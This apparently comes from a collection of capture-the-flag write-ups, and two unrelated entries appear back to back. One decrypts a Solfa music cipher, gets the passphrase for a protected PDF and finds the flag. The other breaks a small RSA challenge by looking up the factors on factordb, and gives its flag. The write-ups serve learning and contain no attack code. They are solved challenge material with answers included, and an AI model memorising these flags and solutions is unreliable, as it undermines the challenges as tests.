Figure 1
The colums represent the pitch, while te rows represent the time units for each note (1, 2, 3 or 4). It's mentioned in the writeup that the key is defined using a clef, a tonic, a mode and a rythmic unit. These 4 elements when combined, generate a key which can be used for both encryption and decryption. We know that the first line of the pdf is the key used for encryption which means we can figure out the settings of the 4 elements. I tried multiple settings on [this website](https://wmich.edu/mus-theo/solfa-cipher/secrets/) to see if I could get the same key as we have. Luckily, with Treble as the Clef, C as the tonic, Major as the Mode, and Eight as the rythmic unit I was able to get the original key back.
Figure 2
The given key specifies a _1/8_ rhythm, as such an [Eighth](https://en.wikipedia.org/wiki/Eighth_note) note will be worth 1-time unit, a [Quarter](https://en.wikipedia.org/wiki/Quarter_note) note will be worth 2-time units and the [half note](https://en.wikipedia.org/wiki/Half_note) will be worth 4-time units. After studying a little bit of music theory I was able to figure out that a `.` with a music note meant n+1 time units. At this point, I had a good understanding of how the Solfa cipher worked, but I wasn't sure what the z-like looking note signified, so I asked the admin about it, and he answered that it's a buffer character worth a 2-time unit.
Using the Key, we can write out the correct scale with its associated solfege syllables (Do, Re, Mi, Fa, So, La, Ti) and divide up the rhythms into counts of four 8th notes. The first downbeat is always '1'. Let's start mapping the counts onto the pdf. I have tried to explain the mapping process in the following diagram.
Figure 3
Okay, so we're done with the hard part, now we just need to know the alphabet equivalents of all solfege syllables. We can easily find the solfege syllables' alphabets equivalent on google.
Figure 4
We have got all we need to decrypt the ciphertext. Let's begin the process.
Figure 5
After applying the above process on all of the ciphertext, you'll end up with:
`R,1 M,1 F,3 F,1 T,1 D,3 D,3 R,4 F,3 T,1 F,3 R,1 M,3 M,1 T,4 S,1 M,4 T,1 D,1 D,1 T,1 M,4 T,1 L,3 R,1 T,4 S,1 F,3 R,4 F,3 T,3 F,1 R,1 R,3`
Using the table in Figure 1, we decode it to following plaintext:
`iamsorrymomihavegottogolivemymusic`
We have the plaintext but no idea what to do with it. Let's have a look at the tune_700.mp3 file. Running strings command on it yields a [Google Drive link](https://drive.google.com/uc?export=download&id=1SR0Ztj6QpZlu39q28W0OBBDWJrDMTujB) that yields another pdf.
It's a password-protected PDF document. Perhaps the plaintext we obtained is the pdf's passcode? Let us give it a go. And, voila! We have got the flag.
Figure 6 |
___# RSA - 1_(crypto, 150 points, 191 solves)_
I have a lot of big numbers. Here, have a few!
[big_numbers.txt](./big_numbers.txt)___
## InvestigationObviously, this is a RSA challenge and despite they are calling them big_numbers, those numbers aren't _that_ big. Therefore, `n` can be factored out with reasonable efforts.
## SolutionSomeone already did the factorization of `n` and so I was able to fetch the corresponding `p` and `q` from [factordb](http://factordb.com/). From that point I justfollowed basic schoolbook RSA algorithm to derive `d` and decrypt `c`.
See [exploit](./exploit.py) for an implementation in python.
> dsc{t00_much_m4th_8898}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.